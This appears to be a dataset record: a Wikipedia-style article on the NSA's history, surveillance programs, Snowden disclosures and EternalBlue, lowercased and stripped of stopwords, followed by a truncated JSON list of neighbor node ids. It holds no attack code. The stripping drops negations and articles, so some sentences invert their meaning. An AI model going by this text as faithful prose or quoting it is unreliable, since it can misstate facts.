aftermath september 11 attacks nsa created new systems deal flood information new technologies like internet cellphones thinthread contained advanced data mining capabilities also privacy mechanism surveillance stored encrypted decryption required warrant research done program may contributed technology used later systems thinthread cancelled michael hayden chose trailblazer include thinthread privacy system trailblazer project ramped 2002 worked science applications international corporation saic boeing computer sciences corporation ibm litton industries nsa whistleblowers complained internally major problems surrounding trailblazer led investigations congress nsa dod inspectors general project cancelled early 2004 turbulence started 2005 developed small inexpensive test pieces rather one grand plan like trailblazer also included offensive cyber-warfare capabilities like injecting malware remote computers congress criticized turbulence 2007 similar bureaucratic problems trailblazer realization information processing higher speeds cyberspace massive extent nsa spying foreign domestic revealed public series detailed disclosures internal nsa documents beginning june 2013 disclosures leaked former nsa contractor edward snowden nsa eavesdropping mission includes radio broadcasting various organizations individuals internet telephone calls intercepted forms communication secure communications mission includes military diplomatic sensitive confidential secret government communications according 2010 article washington post e day collection systems national security agency intercept store 1.7 billion e-mails phone calls types communications nsa sorts fraction 70 separate databases listening task nsa/css heavily involved cryptanalytic research continuing work predecessor agencies broken many world war ii codes ciphers see instance purple venona project jn-25 2004 nsa central security service national cyber security division department homeland security dhs agreed expand nsa centers academic excellence information assurance education program part national security presidential directive 54/homeland security presidential directive 23 nspd 54 signed january 8 2008 president bush nsa became lead agency monitor protect federal government computer networks cyber-terrorism operations national security agency divided three types echelon created incubator cold war today legacy system several nsa stations closing nsa/css combination equivalent agencies united kingdom government communications headquarters canada communications security establishment australia defence signals directorate new zealand government communications security bureau otherwise known ukusa group reported command operation so-called echelon system capabilities suspected include ability monitor large proportion world transmitted civilian telephone fax data traffic early 1970s first became eight large satellite communications dishes installed menwith hill investigative journalist duncan campbell reported 1988 echelon surveillance program extension ukusa agreement global signals intelligence sigint detailed eavesdropping operations worked november 3 1999 bbc reported confirmation australian government existence powerful global spying network code-named echelon could eavesdrop every single phone call fax e-mail anywhere planet britain united states chief protagonists confirmed menwith hill linked directly headquarters us national security agency nsa fort meade maryland nsa united states signals intelligence directive 18 ussid 18 strictly prohibited interception collection information ... u.s. persons entities corporations organizations ... without explicit written legal permission united states attorney general subject located abroad foreign intelligence surveillance court within u.s. borders alleged echelon-related activities including use motives national security including political industrial espionage received criticism countries outside ukusa alliance nsa also involved planning blackmail people sexint intelligence gained potential target sexual activity preferences targeted committed apparent crime charged one order support facial recognition program nsa intercepting millions images per day real time regional gateway data collection program introduced 2005 iraq nsa iraq war consisted gathering electronic communication storing searching otherwise analyzing effective providing information iraqi insurgents eluded less comprehensive techniques collect strategy introduced nsa director keith b. alexander believed glenn greenwald guardian model comprehensive worldwide mass archiving communications nsa engaged 2013 dedicated unit nsa locates targets cia extrajudicial assassination middle east nsa also spied extensively european union united nations numerous governments including allies trading partners europe south america asia june 2015 wikileaks published documents showing nsa spied french companies july 2015 wikileaks published documents showing nsa spied federal german ministries since 1990s even germany chancellor angela merkel cellphones phone predecessors intercepted edward snowden revealed june 2013 february 8 march 8 2013 nsa collected 124.8 billion telephone data items 97.1 billion computer data items throughout world displayed charts internal nsa tool codenamed boundless informant initially reported data reflected eavesdropping citizens countries like germany spain france later became clear data collected european agencies military missions abroad subsequently shared nsa 2013 reporters uncovered secret memo claims nsa created pushed adoption dual ec drbg encryption standard contained built-in vulnerabilities 2006 united states national institute standards technology nist international organization standardization aka iso memo appears give credence previous speculation cryptographers microsoft research edward snowden claims nsa often bypasses encryption altogether lifting information encrypted decrypted xkeyscore rules specified file xkeyscorerules100.txt sourced german tv stations ndr wdr claim excerpts source code reveal nsa tracks users privacy-enhancing software tools including tor anonymous email service provided mit computer science artificial intelligence laboratory csail cambridge massachusetts readers linux journal linus torvalds founder linux kernel joked linuxcon keynote september 18 2013 nsa founder selinux wanted backdoor kernel however later linus father member european parliament mep revealed nsa actually ibm notes first widely adopted software product use public key cryptography client–server server–server authentication encryption data us laws regulating encryption changed 2000 ibm lotus prohibited exporting versions notes supported symmetric encryption keys longer 40 bits 1997 lotus negotiated agreement nsa allowed export version supported stronger keys 64 bits 24 bits encrypted special key included message provide workload reduction factor nsa strengthened protection users notes outside us private-sector industrial espionage spying us government assumed foreign transmissions terminating u.s. non-u.s. citizen accessing u.s. website subject non-u.s. citizens nsa surveillance recent research boomerang routing raised new concerns nsa ability surveil domestic internet traffic foreign countries boomerang routing occurs internet transmission originates terminates single country transits another research university toronto suggested approximately 25 canadian domestic traffic may subject nsa surveillance activities result boomerang routing canadian internet service providers document included nsa files released glenn greenwald book place hide details agency tailored access operations tao nsa units gain access hardware intercept routers servers network hardware shipped organizations targeted surveillance install covert implant firmware onto delivered described nsa manager productive operations tao preposition access points hard target networks around world computers seized nsa due interdiction often modified physical device known cottonmouth cottonmouth device inserted usb port computer order establish remote access targeted machine according nsa tailored access operations tao group implant catalog implanting cottonmouth nsa establish network bridge allows nsa load exploit software onto modified computers well allowing nsa relay commands data hardware software implants nsa mission set forth executive order 12333 1981 collect information constitutes foreign intelligence counterintelligence acquiring information concerning domestic activities united states persons nsa declared relies fbi collect information foreign intelligence activities within borders united states confining activities within united states embassies missions foreign nations appearance 'domestic surveillance directorate nsa soon exposed hoax 2013 nsa domestic surveillance activities limited requirements imposed fourth amendment u.s. constitution foreign intelligence surveillance court example held october 2011 citing multiple supreme court precedents fourth amendment prohibitions unreasonable searches seizures applies contents communications whatever means person private communications akin personal papers however protections apply non-u.s. persons located outside u.s. borders nsa foreign surveillance efforts subject far fewer limitations u.s. law specific requirements domestic surveillance operations contained foreign intelligence surveillance act 1978 fisa extend protection non-u.s. citizens located outside u.s. territory george w. bush president 9/11 terrorist attacks approved patriot act shortly attacks take anti-terrorist security measures title 1 2 9 specifically authorized measures would taken nsa titles granted enhanced domestic security terrorism surveillance procedures improved intelligence respectively march 10 2004 debate president bush white house counsel alberto gonzales attorney general john ashcroft acting attorney general james comey attorneys general unsure nsa programs could considered constitutional threatened resign matter ultimately nsa programs continued march 11 2004 president bush signed new authorization mass surveillance internet records addition surveillance phone records allowed president able override laws foreign intelligence surveillance act protected civilians mass surveillance addition president bush also signed measures mass surveillance also retroactively place prism program started 2007 nsa gathers internet communications foreign targets nine major u.s. internet-based communication service providers microsoft yahoo google facebook paltalk aol skype youtube apple data gathered include email video voice chat videos photos voip chats skype file transfers former nsa director general keith alexander claimed september 2009 nsa prevented najibullah zazi friends carrying terrorist attack however claim debunked evidence presented demonstrating nsa ever instrumental preventing terrorist attack besides traditional ways eavesdropping order collect signals intelligence nsa also engaged hacking computers smartphones networks operations conducted tailored access operations tao division active since least circa 1998 according foreign policy magazine ... office tailored access operations tao successfully penetrated chinese computer telecommunications systems almost 15 years generating best reliable intelligence information going inside people republic china interview wired magazine edward snowden said tailored access operations division accidentally caused syria internet blackout 2012 nsa led director national security agency dirnsa also serves chief central security service chcss commander united states cyber command uscybercom highest-ranking military official organizations assisted deputy director highest-ranking civilian within nsa/css nsa also inspector general head office inspector general oig general counsel head office general counsel ogc director compliance head office director compliance odoc unlike intelligence organizations cia dia nsa always particularly reticent concerning internal organizational structure mid-1990s national security agency organized five directorates directorates consisted several groups elements designated letter example group responsible sigint operations soviet union eastern europe g group responsible sigint related non-communist countries groups divided units designated additional number like unit a5 breaking soviet codes g6 office middle east north africa cuba central south america nsa dozen directorates designated letter although publicly known directorates divided divisions units starting letter parent directorate followed number division sub-unit sub-sub-unit main elements organizational structure nsa year 2000 leadership team formed consisting director deputy director directors signals intelligence sid information assurance iad technical directorate td chiefs main nsa divisions became associate directors senior leadership team president george w. bush initiated president surveillance program psp 2001 nsa created 24-hour metadata analysis center mac followed 2004 advanced analysis division aad mission analyzing content internet metadata telephone metadata units part signals intelligence directorate 2016 proposal would combine signals intelligence directorate information assurance directorate directorate operations nsanet stands national security agency network official nsa intranet classified network information level ts/sci support use sharing intelligence data nsa signals intelligence agencies four nations five eyes partnership management nsanet delegated central security service texas csstexas nsanet highly secured computer network consisting fiber-optic satellite communication channels almost completely separated public internet network allows nsa personnel civilian military intelligence analysts anywhere world access agency systems databases access tightly controlled monitored example every keystroke logged activities audited random downloading printing documents nsanet recorded 1998 nsanet along niprnet siprnet significant problems poor search capabilities unorganized data old information 2004 network reported used twenty commercial off-the-shelf operating systems universities highly sensitive research allowed connect thousands top secret internal nsa documents taken edward snowden 2013 stored file-sharing location nsa intranet site could easily read online nsa personnel everyone ts/sci-clearance access documents system administrator snowden responsible moving accidentally misplaced highly sensitive documents safer storage locations nsa maintains least two watch centers number nsa employees officially classified several sources providing estimates 1961 nsa 59,000 military civilian employees grew 93,067 1969 19,300 worked headquarters fort meade early 1980s nsa roughly 50,000 military civilian personnel 1989 number grown 75,000 25,000 worked nsa headquarters 1990 1995 nsa budget workforce cut one third led substantial loss experience 2012 nsa said 30,000 employees worked fort meade facilities 2012 john c. inglis deputy director said total number nsa employees somewhere 37,000 one billion joke stated agency probably biggest employer introverts 2013 der spiegel stated nsa 40,000 employees widely described world largest single employer mathematicians nsa employees form part workforce national reconnaissance office nro agency provides nsa satellite signals intelligence 2013 1,000 system administrators work nsa nsa received criticism early 1960 two agents defected soviet union investigations house un-american activities committee special subcommittee united states house committee armed services revealed severe cases ignorance personnel security regulations prompting former personnel director director security step leading adoption stricter security practices nonetheless security breaches reoccurred year later issue izvestia july 23 1963 former nsa employee published several cryptologic secrets day nsa clerk-messenger committed suicide ongoing investigations disclosed sold secret information soviets regular basis reluctance congressional houses look affairs prompted journalist write similar series tragic blunders occurred ordinary agency government aroused public would insist responsible officially censured demoted fired david kahn criticized nsa tactics concealing doings smug congress blind faith agency right-doing shortsighted pointed necessity surveillance congress prevent abuse power edward snowden leaking existence prism 2013 caused nsa institute two-man rule two system administrators required present one accesses certain sensitive information snowden claims suggested rule 2009 nsa conducts polygraph tests employees new employees tests meant discover enemy spies applying nsa uncover information could make applicant pliant coercion part latter historically epqs embarrassing personal questions sexual behavior included nsa polygraph nsa also conducts five-year periodic reinvestigation polygraphs employees focusing counterintelligence programs addition nsa conducts periodic polygraph investigations order find spies leakers refuse take may receive termination employment according 1982 memorandum director nsa also special access examination polygraphs employees wish work highly sensitive areas polygraphs cover counterintelligence questions questions behavior nsa brochure states average test length two four hours 1983 report office technology assessment stated appears nsa national security agency possibly cia use polygraph determine deception truthfulness per se technique interrogation encourage admissions sometimes applicants polygraph process confess committing felonies murder rape selling illegal drugs 1974 1979 20,511 job applicants took polygraph tests 695 3.4 confessed previous felony crimes almost crimes undetected 2010 nsa produced video explaining polygraph process video ten minutes long titled truth polygraph posted web site defense security service jeff stein washington post said video portrays various applicants actors playing — clear — describing everything bad heard test implication none true antipolygraph.org argues nsa-produced video omits information polygraph process produced video responding nsa video george maschke founder web site accused nsa polygraph video orwellian edward snowden revealed identity 2013 nsa began requiring polygraphing employees per quarter number exemptions legal requirements criticized 1964 congress hearing bill giving director nsa power fire employee washington post wrote definition arbitrariness means employee could discharged disgraced basis anonymous allegations without slightest opportunity defend yet bill accepted overwhelming majority also every person hired job us 2007 private organization state federal government agency must reported new hire registry ostensibly look child support evaders except employees intelligence agency may excluded reporting director deems necessary national security reasons agency first established headquarters cryptographic center naval security station washington d.c comint functions located arlington hall northern virginia served headquarters u.s. army cryptographic operations soviet union detonated nuclear bomb facilities crowded federal government wanted move several agencies including afsa/nsa planning committee considered fort knox fort meade maryland ultimately chosen nsa headquarters far enough away washington d.c. case nuclear strike close enough employees would move families construction additional buildings began agency occupied buildings fort meade late 1950s soon outgrew 1963 new headquarters building nine stories tall opened nsa workers referred building headquarters building since nsa management occupied top floor workers used ninth floor refer leaders comsec remained washington d.c. new building completed 1968 september 1986 operations 2a 2b buildings copper-shielded prevent eavesdropping opened dedication president ronald reagan four nsa buildings became known big four nsa director moved 2b opened headquarters national security agency located fort george g. meade maryland although separate compounds agencies based within military installation fort meade southwest baltimore northeast washington d.c nsa two dedicated exits baltimore–washington parkway eastbound exit parkway heading toward baltimore open public provides employee access main campus public access national cryptology museum westbound side exit heading toward washington labeled nsa employees exit may used people proper clearances security vehicles parked along road guard entrance nsa largest employer state maryland two-thirds personnel work fort meade built fort meade site 1,300 buildings estimated 18,000 parking spaces main nsa headquarters operations building james bamford author body secrets describes modern boxy structure appears similar stylish office building building covered one-way dark glass lined copper shielding order prevent espionage trapping signals sounds contains floor space bamford said u.s. capitol could easily fit inside four times facility 100 watchposts one visitor control center two-story area serves entrance entrance white pentagonal structure visitor badges issued visitors security clearances employees checked visitor center includes painting nsa seal ops2a building tallest building nsa complex location much agency operations directorate accessible visitor center bamford described dark glass rubik cube facility red corridor houses non-security operations concessions drug store name refers red badge worn someone without security clearance nsa headquarters includes cafeteria credit union ticket counters airlines entertainment barbershop bank nsa headquarters post office fire department police force employees nsa headquarters reside various places baltimore-washington area including annapolis baltimore columbia maryland district columbia including georgetown community nsa maintains shuttle service odenton station marc visitor control center done since 2005 following major power outage 2000 2003 follow-ups 2007 baltimore sun reported nsa risk electrical overload insufficient internal electrical infrastructure fort meade support amount equipment installed problem apparently recognized 1990s made priority agency ability keep operations going threatened august 6 2006 baltimore sun reported nsa completely maxed grid baltimore gas electric bge constellation energy unable sell power bge provided nsa 65 75 megawatts fort meade 2007 expected increase 10 15 megawatts would needed later year 2011 nsa maryland largest consumer power 2007 bge largest customer nsa bought much electricity annapolis capital city maryland one estimate put potential power consumption new utah data center 40 million per year 1995 baltimore sun reported nsa owner single largest group supercomputers nsa held groundbreaking ceremony fort meade may 2013 high performance computing center 2 expected open 2016 called site center 150 megawatt power substation 14 administrative buildings 10 parking garages cost 3.2 billion covers center initially uses 60 megawatts electricity increments ii iii expected completed 2030 would quadruple space covering 60 buildings 40 parking garages defense contractors also establishing expanding cybersecurity facilities near nsa around washington metropolitan area dod computer security center founded 1981 renamed national computer security center ncsc 1985 ncsc responsible computer security throughout federal government ncsc part nsa late 1980s 1990s nsa ncsc published trusted computer system evaluation criteria six-foot high rainbow series books detailed trusted computing network platform specifications rainbow books replaced common criteria however early 2000s 2012 nsa collected intelligence four geostationary satellites satellite receivers roaring creek station catawissa pennsylvania salt creek station arbuckle california operated ten twenty taps u.s. telecom switches nsa installations several u.s. states observed intercepts europe middle east north africa latin america asia nsa facilities friendship annex fanx linthicum maryland 20 25-minute drive fort meade aerospace data facility buckley air force base aurora outside denver colorado nsa texas texas cryptology center lackland air force base san antonio texas nsa georgia fort gordon augusta georgia nsa hawaii honolulu multiprogram research facility oak ridge tennessee elsewhere january 6 2011 groundbreaking ceremony held begin construction nsa first comprehensive national cyber-security initiative cnci data center known utah data center short 1.5b data center built camp williams utah located south salt lake city help support agency national cyber-security initiative expected operational september 2013 2009 protect assets access electricity nsa sought decentralize expand existing facilities fort meade menwith hill latter expansion expected completed 2015 yakima herald-republic cited bamford saying many nsa bases echelon program legacy system using outdated 1990s technology 2004 nsa closed operations bad aibling station field station 81 bad aibling germany 2012 nsa began move operations yakima research station yakima training center washington state colorado planning leave yakima closed 2013 nsa also intended close operations sugar grove west virginia following signing 1946–1956 ukusa agreement united states united kingdom canada australia new zealand cooperated signals intelligence echelon nsa stations built gchq bude morwenstow united kingdom geraldton pine gap shoal bay australia leitrim ottawa ontario canada misawa japan waihopai tangimoana new zealand nsa operates raf menwith hill north yorkshire united kingdom according bbc news 2007 largest electronic monitoring station world planned 1954 opened 1960 base covered 1999 agency european cryptologic center ecc 240 employees 2011 headquartered us military compound griesheim near frankfurt germany 2011 nsa report indicates ecc responsible largest analysis productivity europe focuses various priorities including africa europe middle east counterterrorism operations 2013 new consolidated intelligence center also used nsa built headquarters united states army europe wiesbaden germany nsa partnership bundesnachrichtendienst bnd german foreign intelligence service confirmed bnd president gerhard schindler thailand 3rd party partner nsa along nine nations non-english-speaking countries made security agreements exchange sigint raw material end product reports thailand site least two us sigint collection stations one us embassy bangkok joint nsa-cia special collection service scs unit presumably eavesdrops foreign embassies governmental communications targets opportunity second installation fornsat foreign satellite interception station thai city khon kaen codenamed indra also referred lemonwood station approximately 40 ha 100 acres size consists large 3,700–4,600 40,000–50,000 ft operations building west side ops compound four radome-enclosed parabolic antennas possibly two radome-enclosed antennas used satcom intercept two antennas used relaying intercepted material back nsa also pusher-type circularly-disposed antenna array cdaa array north ops compound nsa activated khon kaen october 1979 mission eavesdrop radio traffic chinese army air force units southern china especially around city kunming yunnan province back late 1970s base consisted small cdaa antenna array remote-controlled via satellite nsa listening post kunia hawaii small force civilian contractors bendix field engineering corp. whose job keep antenna array satellite relay facilities running 24/7 according papers late general william odom indra facility upgraded 1986 new british-made pusher cdaa antenna part overall upgrade nsa thai sigint facilities whose objective spy neighboring communist nations vietnam laos cambodia base apparently fell disrepair 1990s china vietnam became friendly towards us 2002 archived satellite imagery showed pusher cdaa antenna torn perhaps indicating base closed point period since 9/11 khon kaen base reactivated expanded include sizeable satcom intercept mission likely nsa presence khon kaen relatively small work done civilian contractors nsa involved debates public policy indirectly behind-the-scenes adviser departments directly vice admiral bobby ray inman directorship nsa major player debates 1990s regarding export cryptography united states restrictions export reduced eliminated 1996 secure government communications work involved nsa numerous technology areas including design specialized communications hardware software production dedicated semiconductors ft. meade chip fabrication plant advanced cryptography research 50 years nsa designed built computer equipment in-house 1990s 2003 u.s. congress curtailed practice agency contracted private sector fields research equipment nsa embroiled minor controversy concerning involvement creation data encryption standard des standard public block cipher algorithm used u.s. government banking community development des ibm 1970s nsa recommended changes details design suspicion changes weakened algorithm sufficiently enable agency eavesdrop required including speculation critical component—the so-called s-boxes—had altered insert backdoor reduction key length might made feasible nsa discover des keys using massive computing power since observed s-boxes des particularly resilient differential cryptanalysis technique publicly discovered late 1980s known ibm des team involvement nsa selecting successor data encryption standard des advanced encryption standard aes limited hardware performance testing see aes competition nsa subsequently certified aes protection classified information used nsa-approved systems nsa responsible encryption-related components legacy systems nsa oversees encryption following systems use today nsa specified suite suite b cryptographic algorithm suites used u.s. government systems suite b algorithms subset previously specified nist expected serve information protection purposes suite algorithms secret intended especially high levels protection widely used sha-1 sha-2 hash functions designed nsa sha-1 slight modification weaker sha-0 algorithm also designed nsa 1993 small modification suggested nsa two years later justification fact provides additional security attack sha-0 apply revised algorithm indeed found 1998 2005 academic cryptographers weaknesses key length restrictions sha-1 nist deprecates use digital signatures approves newer sha-2 algorithms applications 2013 new hash standard sha-3 recently selected competition concluded october 2 2012 selection keccak algorithm process select sha-3 similar one held choosing aes doubts cast since fundamental modifications made keccak order turn standard changes potentially undermine cryptanalysis performed competition reduce security levels algorithm nsa promoted inclusion random number generator called dual ec drbg u.s. national institute standards technology 2007 guidelines led speculation backdoor would allow nsa access data encrypted systems using pseudo random number generator deemed plausible based fact output next iterations prng provably determined relation two internal elliptic curve points known nist rsa officially recommending use prng concerns widespread use strong cryptography would hamper government use wiretaps nsa proposed concept key escrow 1993 introduced clipper chip would offer stronger protection des would allow access encrypted data authorized law enforcement officials proposal strongly opposed key escrow requirements ultimately went nowhere however nsa fortezza hardware-based encryption cards created clipper project still used within government nsa ultimately declassified published design skipjack cipher used cards perfect citizen program perform vulnerability assessment nsa u.s. critical infrastructure originally reported program develop system sensors detect cyber attacks critical infrastructure computer networks private public sector network monitoring system named einstein funded comprehensive national cybersecurity initiative thus far raytheon received contract 100 million initial stage nsa invested many millions dollars academic research grant code prefix mda904 resulting 3,000 papers nsa/css times attempted restrict publication academic research cryptography example khufu khafre block ciphers voluntarily withheld response nsa request response foia lawsuit 2013 nsa released 643-page research paper titled untangling web guide internet research written compiled nsa employees assist nsa workers searching information interest agency public internet nsa ability file patent u.s. patent trademark office gag order unlike normal patents revealed public expire however patent office receives application identical patent third party reveal nsa patent officially grant nsa full term date one nsa published patents describes method geographically locating individual computer site internet-like network based latency multiple network connections although public patent exists nsa reported used similar locating technology called trilateralization allows real-time tracking individual location including altitude ground level using data obtained cellphone towers heraldic insignia nsa consists eagle inside circle grasping key talons eagle represents agency national mission breast features shield bands red white taken great seal united states representing congress key taken emblem saint peter represents security nsa created agency emblem used department defense agency adopted first two emblems 1963 current nsa insignia use since 1965 then-director ltg marshall s. carter usa ordered creation device represent agency nsa flag consists agency seal light blue background crews associated nsa missions involved number dangerous deadly situations uss liberty incident 1967 uss pueblo incident 1968 examples losses endured cold war national security agency/central security service cryptologic memorial honors remembers fallen personnel military civilian intelligence missions made black granite 171 names carved located nsa headquarters tradition declassifying stories fallen begun 2001 united states least since 2001 legal controversy signal intelligence used much freedom national security agency use signal intelligence 2015 government made slight changes uses collects certain types data specifically phone records government analyzing phone records early 2019 december 16 2005 new york times reported white house pressure executive order president george w. bush national security agency attempt thwart terrorism tapping phone calls made persons outside country without obtaining warrants united states foreign intelligence surveillance court secret court created purpose foreign intelligence surveillance act fisa one surveillance program authorized u.s signals intelligence directive 18 president george bush highlander project undertaken national security agency u.s. army 513th military intelligence brigade nsa relayed telephone including cell phone conversations obtained ground airborne satellite monitoring stations various u.s. army signal intelligence officers including 201st military intelligence battalion conversations citizens u.s. intercepted along nations proponents surveillance program claim president executive authority order action arguing laws fisa overridden president constitutional powers addition argued fisa implicitly overridden subsequent statute authorization use military force although supreme court ruling hamdan v. rumsfeld deprecates view august 2006 case aclu v. nsa u.s. district court judge anna diggs taylor concluded nsa warrantless surveillance program illegal unconstitutional july 6 2007 6th circuit court appeals vacated decision grounds aclu lacked standing bring suit january 17 2006 center constitutional rights filed lawsuit ccr v. bush george w. bush presidency lawsuit challenged national security agency nsa surveillance people within u.s. including interception ccr emails without securing warrant first september 2008 electronic frontier foundation eff filed class action lawsuit nsa several high-ranking officials bush administration charging illegal unconstitutional program dragnet communications surveillance based documentation provided former technician mark klein result usa freedom act passed congress june 2015 nsa shut bulk phone surveillance program november 29 year usa freedom act forbids nsa collect metadata content phone calls unless warrant terrorism investigation case agency ask telecom companies record kept six months may 2008 mark klein former employee alleged company cooperated nsa installing narus hardware replace fbi carnivore program monitor network communications including traffic u.s. citizens nsa reported 2008 use computing capability analyze transactional data regularly acquires government agencies gather jurisdictional authorities part effort nsa monitors huge volumes records domestic email data web addresses internet searches bank transfers credit-card transactions travel records telephone data according current former intelligence officials interviewed wall street journal sender recipient subject line emails included content messages phone calls 2013 advisory group obama administration seeking reform nsa spying programs following revelations documents released edward j. snowden mentioned 'recommendation 30 page 37 ... national security council staff manage interagency process review regular basis activities us government regarding attacks exploit previously unknown vulnerability computer application retired cyber security expert richard a. clarke group member stated april 11 nsa advance knowledge heartbleed august 2013 revealed 2005 irs training document showed nsa intelligence intercepts wiretaps foreign domestic supplied drug enforcement administration dea internal revenue service irs illegally used launch criminal investigations us citizens law enforcement agents directed conceal investigations began recreate apparently legal investigative trail re-obtaining evidence means months leading april 2009 nsa intercepted communications u.s. citizens including congressman although justice department believed interception unintentional justice department took action correct issues bring program compliance existing laws united states attorney general eric holder resumed program according understanding foreign intelligence surveillance act amendment 2008 without explaining occurred polls conducted june 2013 found divided results among americans regarding nsa secret data collection rasmussen reports found 59 americans disapprove gallup found 53 disapprove pew found 56 favor nsa data collection april 25 2013 nsa obtained court order requiring verizon business network services provide metadata calls system nsa ongoing daily basis three-month period reported guardian june 6 2013 information includes numbers parties call ... location data call duration unique identifiers time duration calls contents conversation order relies so-called business records provision patriot act august 2013 following snowden leaks new details nsa data mining activity revealed reportedly majority emails united states captured selected communications links automatically analyzed keywords selectors emails match deleted utility massive metadata collection preventing terrorist attacks disputed many studies reveal dragnet like system ineffective one report released new america foundation concluded analysis 225 terrorism cases nsa discernible impact preventing acts terrorism defenders program said metadata alone ca n't provide information necessary prevent attack assures ability connect dots suspect foreign numbers domestic numbers speed nsa software capable one benefit quickly able determine difference suspicious activity real threats example nsa director general keith b. alexander mentioned annual cybersecurity summit 2013 metadata analysis domestic phone call records boston marathon bombing helped determine rumors follow-up attack new york baseless addition doubts effectiveness many people argue collection metadata unconstitutional invasion privacy collection process remains legal grounded ruling smith v. maryland 1979 prominent opponent data collection legality u.s. district judge richard j. leon issued report 2013 stated imagine 'indiscriminate 'arbitrary invasion systematic high tech collection retention personal data virtually every single citizen purposes querying analyzing without prior judicial approval ... surely program infringes 'that degree privacy founders enshrined fourth amendment may 7 2015 u.s. court appeals second circuit ruled interpretation section 215 patriot act wrong nsa program collecting americans phone records bulk illegal stated section 215 clearly interpreted allow government collect national phone data result expired june 1 2015 ruling first time higher-level court regular judicial system reviewed n.s.a phone records program replacement law known usa freedom act enable nsa continue bulk access citizens metadata stipulation data stored companies change effect agency procedures outside metadata collection purportedly challenged americans fourth amendment rights including upstream collection mass techniques used agency collect store american data/communications directly internet backbone upstream program nsa paid telecommunications companies 9 95 million dollars order collect data companies google yahoo claim provide direct access servers nsa unless court order nsa access emails phone calls cellular data users new ruling telecommunications companies maintain bulk user metadata servers least 18 months provided upon request nsa ruling made mass storage specific phone records nsa datacenters illegal rule section 215 constitutionality declassified document revealed 17,835 phone lines improperly permitted alert list 2006 2009 breach compliance tagged phone lines daily monitoring eleven percent monitored phone lines met agency legal standard reasonably articulable suspicion ras nsa tracks locations hundreds millions cellphones per day allowing map people movements relationships detail nsa reported access communications made via google microsoft facebook yahoo youtube aol skype apple paltalk collects hundreds millions contact lists personal email instant messaging accounts year also managed weaken much encryption used internet collaborating coercing otherwise infiltrating numerous technology companies leave backdoors systems majority encryption inadvertently vulnerable different forms attack domestically nsa proven collect store metadata records phone calls including 120 million us verizon subscribers well intercept vast amounts communications via internet upstream government legal standing rely secret interpretation patriot act whereby entirety us communications may considered relevant terrorism investigation expected even tiny minority may relate terrorism nsa also supplies foreign intercepts dea irs law enforcement agencies use initiate criminal investigations federal agents instructed recreate investigative trail via parallel construction nsa also spies influential muslims obtain information could used discredit use pornography targets domestic abroad suspected crime hold religious political views deemed radical nsa according report washington post july 2014 relying information provided snowden 90 placed surveillance u.s. ordinary americans intended targets newspaper said examined documents including emails text messages online accounts support claim despite white house claims programs congressional oversight many members congress unaware existence nsa programs secret interpretation patriot act consistently denied access basic information united states foreign intelligence surveillance court secret court charged regulating nsa activities according chief judge incapable investigating verifying often nsa breaks even secret rules since reported nsa violated rules data access thousands times year many violations involving large-scale data interceptions nsa officers even used data intercepts spy love interests nsa violations self-reported instance resulted administrative action termination nsa generally disregarded special rules disseminating united states person information illegally sharing intercepts law enforcement agencies march 2009 fisa court opinion court released states protocols restricting data queries frequently systemically violated fairly said critical element overall ... regime never functioned effectively 2011 court noted volume nature nsa bulk foreign internet intercepts fundamentally different court led believe email contact lists including us citizens collected numerous foreign locations work around illegality us soil legal opinions nsa bulk collection program differed mid-december 2013 u.s. district judge richard leon ruled almost-orwellian program likely violates constitution wrote imagine 'indiscriminate 'arbitrary invasion systematic high-tech collection retention personal data virtually every single citizen purposes querying analyzing without prior judicial approval surely program infringes 'that degree privacy founders enshrined fourth amendment indeed little doubt author constitution james madison cautioned us beware 'the abridgement freedom people gradual silent encroachments power would aghast later month u.s. district judge william pauley ruled nsa collection telephone records legal valuable fight terrorism opinion wrote bulk telephony metadata collection program wide net could find isolate gossamer contacts among suspected terrorists ocean seemingly disconnected data noted similar collection data prior 9/11 might prevented attack march 2013 senate intelligence committee hearing senator ron wyden asked director national intelligence james clapper nsa collect type data millions hundreds millions americans clapper replied sir ... wittingly cases could inadvertently perhaps collect wittingly statement came scrutiny months later june 2013 details prism surveillance program published showing nsa apparently gain access servers nine internet companies wide range digital data wyden said clapper failed give straight answer testimony clapper response criticism said responded thought truthful least untruthful manner clapper added honest differences semantics -- someone says ‘ collection ’ specific meaning may different meaning nsa whistler-blower edward snowden additionally revealed existence xkeyscore top secret nsa program allows agency search vast databases metadata well content emails internet activity browser history capability search name telephone number ip address keywords language internet activity conducted type browser used xkeyscore provides technological capability legal authority target even us persons extensive electronic surveillance without warrant provided identifying information email ip address known analyst regarding necessity nsa programs alexander stated june 27 nsa bulk phone internet intercepts instrumental preventing 54 terrorist events including 13 us one cases provided initial tip unravel threat stream july 31 nsa deputy director john inglis conceded senate intercepts vital stopping terrorist attacks close vital identifying convicting four san diego men sending us 8,930 al-shabaab militia conducts terrorism somalia u.s. government aggressively sought dismiss challenge fourth amendment cases raised granted retroactive immunity isps telecoms participating domestic surveillance u.s. military acknowledged blocking access parts guardian website thousands defense personnel across country blocking entire guardian website personnel stationed throughout afghanistan middle east south asia october 2014 united nations report condemned mass surveillance united states countries violating multiple international treaties conventions guarantee core privacy rights exploit eternalblue believed created nsa used unprecedented worldwide wannacry ransomware attack may 2017 exploit leaked online hacking group shadow brokers nearly month prior attack number experts pointed finger nsa non-disclosure underlying vulnerability loss control eternalblue attack tool exploited edward snowden said nsa privately disclosed flaw used attack hospitals found lost attack might happened wikipedia co-founder jimmy wales stated joined microsoft leaders industry saying huge screw-up government ... moment nsa found notified microsoft could quietly issue patch really chivvy people along long became huge problem",
    "neighbors": [
      2050,
      4611,
      9732,
      3590,
      6668,
      4623,
      3088,
      9233,
      2580,
      6164,
      4118,
      7703,
      8726,
      9240,
      6170,
      9750,
      8735,
      3619,
      11302,
      8750,
      10801,
      7731,
      1589,
      7735,
      7736,
      7228,
      5183,
      9279,
      10305,
      10307,
      11335,
      4168,
      2636,
      7759,
      6224,
      10832,
      3154,
      3155,
      8276,
      11349,
      7256,
      6749,
      4703,
      5216,
      8288,
      8802,
      6755,
      2148,
      2661,
      3686,
      10338,
      10341,
      11368,
      2154,
      107,
      7275,
      7786,
      8302,
      4719,
      8814,
      10859,
      2162,
      3701,
      5749,
      3703,
      636,
      5245,
      7806,
      5247,
      7809,
      5764,
      11397,
      8331,
      10892,
      9357,
      3726,
      4240,
      1169,
      1683,
      2712,
      6136,
      4250,
      9373,
      3742,
      7327,
      2208,
      9375,
      5282,
      8356,
      1189,
      678,
      2213,
      6312,
      9900,
      173,
      2221,
      2734,
      3759,
      7345,
      1714,
      6834,
      180,
      9395,
      10417,
      10935,
      5308,
      5310,
      10433,
      6343,
      6344,
      2761,
      3274,
      5322,
